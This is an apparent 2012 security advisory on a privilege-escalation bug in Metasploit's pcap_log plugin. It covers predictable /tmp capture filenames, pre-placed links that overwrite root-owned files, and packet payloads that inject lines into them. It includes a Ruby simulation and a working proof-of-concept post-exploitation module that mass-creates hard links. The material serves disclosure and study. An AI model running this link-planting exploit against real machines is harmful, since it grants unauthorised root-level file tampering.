Monday, 16 July 2012

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

UPDATED 29 October 2012

Finessed exploit now included in metasploit -

0A29-12-2 : Metasploit 'pcap_log' plugin privilege escalation vulnerability

Author: 0a29406d9794e4f9b30b3c5d6702c708 - GMail: 0a2940


The Metasploit plugin 'pcap_log' is vulnerable to an arbitrary file overwrite bug.
Because the plugin keeps writing captured packets into the overwritten file, the
bug can be further leveraged to insert attacker-controlled data into a privileged
file, which may result in escalation of privileges.


16 July 2012 - Reported
16 July 2012 - Acknowledged & fixed by HD Moore
16 July 2012 - Public disclosure


By default the pcap_log plugin (plugins/pcap_log.rb) logs captured packets to a
file in /tmp whose name is built from the current time, e.g.
'/tmp/msf3-session_2012-07-16_15-15-35.pcap'. That name is of course predictable,
so a local user who creates a link with that name in advance, pointing at a
privileged file, gets that file overwritten as soon as the plugin starts. The
overwrite reaches privileged files because the plugin runs inside msfconsole,
which has to run as root to capture packets. (A plain 'ln' makes a hard link,
so /tmp and the target must be on the same filesystem; 'ln -s' works across
filesystems.)

Here's the fun part: once the file is overwritten, every packet the plugin
captures is appended to it, so by sending packets with a chosen payload at the
victim we can insert our own content into that file. The content arrives
surrounded by pcap headers and all the other captured packets, so it has to be
framed (e.g. placed on lines of its own) in a way that whatever later reads the
file still picks it up despite the binary junk around it.
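
To see what the overwritten file looks like to whatever later reads it, here is an added example (my code, not part of the original advisory and not code from Metasploit). It builds a pcap file the way pcap_log would, with attacker-chosen bytes inside one packet's TCP payload, then reads it back line by line the way a line-oriented consumer of a text file would. The bytes around the payload are constructed filler, the injected line is a placeholder, the timestamp is made up and all function and constant names are mine; for a real target the injected line would have to be valid syntax for whichever file was overwritten.

```ruby
# Added example (not from the advisory or from Metasploit): simulate what the
# overwritten file contains after pcap_log has written a few packets into it,
# one of which carries attacker-chosen bytes.  Filler, names, timestamp and
# the injected line are constructed for this illustration.

# pcap global header (little-endian): magic, major 2, minor 4, thiszone 0,
# sigfigs 0, snaplen 65535, linktype 1 (Ethernet)
PCAP_GLOBAL_HEADER = [0xa1b2c3d4, 2, 4, 0, 0, 65535, 1].pack('VvvVVVV')

# Constructed filler standing in for the Ethernet/IP/TCP headers that precede
# the TCP payload in every captured packet (not a parsable packet).
FAKE_L2_L4_HEADERS = ([0x00, 0x11, 0x22, 0x33, 0x44, 0x55,
                       0x66, 0x77, 0x88, 0x99, 0xaa, 0xbb,
                       0x08, 0x00, 0x45, 0x00] + [0xff] * 38).pack('C*')

# One pcap record: ts_sec, ts_usec, incl_len, orig_len, then the packet bytes.
def pcap_record(packet, ts_sec = 1342448135)
  packet = packet.b
  [ts_sec, 0, packet.bytesize, packet.bytesize].pack('VVVV') + packet
end

# What the privileged file holds once pcap_log has opened it and logged three
# packets: an unrelated request, the attacker's packet, and some more noise.
# With framed: true the attacker's payload is wrapped in newlines so it lands
# on a line of its own; with framed: false it is glued to the binary junk.
def build_overwritten_file(injected_line, framed: true)
  payload = framed ? "\n#{injected_line}\n" : injected_line
  PCAP_GLOBAL_HEADER +
    pcap_record(FAKE_L2_L4_HEADERS + "GET / HTTP/1.0\r\n\r\n") +
    pcap_record(FAKE_L2_L4_HEADERS + payload) +
    pcap_record(FAKE_L2_L4_HEADERS + "\x00" * 16)
end

# How a line-oriented consumer sees the file: lines of clean printable text
# are candidates for parsing; everything else is garbage it skips or rejects.
def recover_clean_lines(data)
  data.b.split("\n".b).select { |l| l.ascii_only? && l =~ /\A[[:print:]]+\z/ }
end

if __FILE__ == $0
  p recover_clean_lines(build_overwritten_file("injected-by-attacker"))
  p recover_clean_lines(build_overwritten_file("injected-by-attacker", framed: false))
end
```

The framed payload comes back as exactly one clean line; the unframed one never does, because the record header of the next packet follows it immediately and the whole run is one line of binary. The other lines of the file are pcap and packet headers that a parser of that file format would have to tolerate or reject; whether it does is what decides if the overwrite turns into privilege escalation or merely into a corrupted file.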

Sample PoC (needs work)


# $Id$

# ## This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.

require 'msf/core'
require 'rex'
require 'msf/core/post/common'
require 'msf/core/post/file'
require 'msf/core/post/linux/system'

class Metasploit3 < Msf::Post

    include Msf::Post::Common
    include Msf::Post::File
    include Msf::Post::Linux::System

    def initialize(info={})
        super( update_info( info,
                'Name'          => 'Metasploit plugin "pcap_log" arbitrary file overwrite / privilege escalation',
                'Description'   => %q{ Post exploitation module to exploit 0A29-12-2, a vulnerability in the Metasploit pcap_log plugin.
                            Depending on the file you choose to overwrite, you will need to netcat/telnet etc. the data
                            that you wish to appear in the file.},
                'License'       => MSF_LICENSE,
                'Author'        => [ '0a29406d9794e4f9b30b3c5d6702c708' ],
                'Version'       => '$Revision$',
                'Platform'      => [ 'linux' ],
                'SessionTypes'  => [ 'shell', 'meterpreter' ],
                'References'    =>
                    [
                        [ 'URL', '' ],
                        [ 'URL', '' ]
                    ],
                'DisclosureDate'=> "July 16 2012"
            ))

        register_options(
            [
                OptInt.new('NUMBER',  [true, 'Number of seconds to prime /tmp/ with', nil]),
                OptString.new('FILE', [true, 'File to overwrite with PCAP data', nil])
            ], self.class)
    end

    # Create a link in /tmp carrying the name pcap_log would pick if it were
    # started at time t, pointing at the file we want overwritten.  /bin/ln
    # without -s makes a hard link, so /tmp and FILE must be on the same
    # filesystem (use 'ln -s' otherwise).
    def link(t)
        file_part = "%s_%04d-%02d-%02d_%02d-%02d-%02d.pcap" % [
                    "msf3-session", t.year, t.month, t.mday, t.hour, t.min, t.sec ]
        fname = ::File.join("/tmp", file_part)
        cmd_exec("/bin/ln #{datastore['FILE']} #{fname}")
    end

    # Run Method for when run command is issued
    def run
        # One link for each of the next NUMBER seconds, so whichever second
        # the victim starts pcap_log in, the file name is already taken.
        # Times come from this host's clock, which must agree with the
        # victim's clock and timezone for the names to match.
        n = datastore['NUMBER'].to_i
        now = Time.now
        (0..n).each { |i| link(now + i) }
        print_status("Set #{n + 1} links.")
    end

    def cleanup
        print_status("Manual cleanup required: rm -f /tmp/msf3-session*")
    end

end